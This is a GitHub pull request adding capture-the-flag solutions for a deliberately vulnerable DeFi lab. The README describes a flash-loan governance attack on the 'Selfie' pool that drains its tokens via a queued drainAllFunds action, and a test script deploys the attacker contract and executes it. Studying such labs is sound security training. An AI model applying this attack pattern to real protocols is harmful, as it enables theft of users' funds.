Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

solution and explication #6

Merged
merged 1 commit into from
Dec 28, 2021
Merged

solution and explication #6

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
21 changes: 20 additions & 1 deletion README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -78,10 +78,29 @@ You don't have any DVT tokens. But in the upcoming round, you must claim most re
Solution:

Create a contract that calls the function flashLoan:
- that call receiveFlashLoan, it will do:
- that calls receiveFlashLoan, it will do:
- a deposit of the amount loaned, which generate a reward
- withdraw the amount
- transfer back tokens loaned
- then transfer token from rewardToken to the attacker

(take care to have approve transfer from theRewarderPool to flashLoanPool)

### 6 Selfie

A new cool lending pool has launched! It's now offering flash loans of DVT tokens.

Wow, and it even includes a really fancy governance mechanism to control it.

You start with no DVT tokens in balance, and the pool has 1.5 million. Your objective: take them all.

Solution:

Create a contract that calls the function flashLoan:
- thats call receiveFlashLoan, it will do:
- have a lot of governance tokens (same as the pool tokens)
- do a snapshot of the governance token -> it gives & remembers vote rights
- throught queueAction function, use the function drainAllFunds to send the tokens to the attackerEOA (in 2days)
- store the actionId to use it later
- transfer back the tokens to the pool flashloan
- "wait" 2 days and then activate executeAction from governance smart contract
10 changes: 10 additions & 0 deletions test/selfie/selfie.challenge.js
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -31,6 +31,16 @@ describe('[Challenge] Selfie', function () {

it('Exploit', async function () {
/** CODE YOUR EXPLOIT HERE */
const SelfieAttacker = await ethers.getContractFactory('SelfieAttacker', deployer);
this.selfieAttacker = await SelfieAttacker.deploy(
this.token.address, this.pool.address, this.governance.address, attacker.address);

await this.selfieAttacker.connect(attacker).attack();

const actionId = ethers.BigNumber.from(await this.selfieAttacker.connect(attacker).actionId());

await ethers.provider.send("evm_increaseTime", [2 * 24 * 60 * 60]); // Advance in time 2 days
await this.governance.connect(attacker).executeAction(actionId);
});

after(async function () {
Expand Down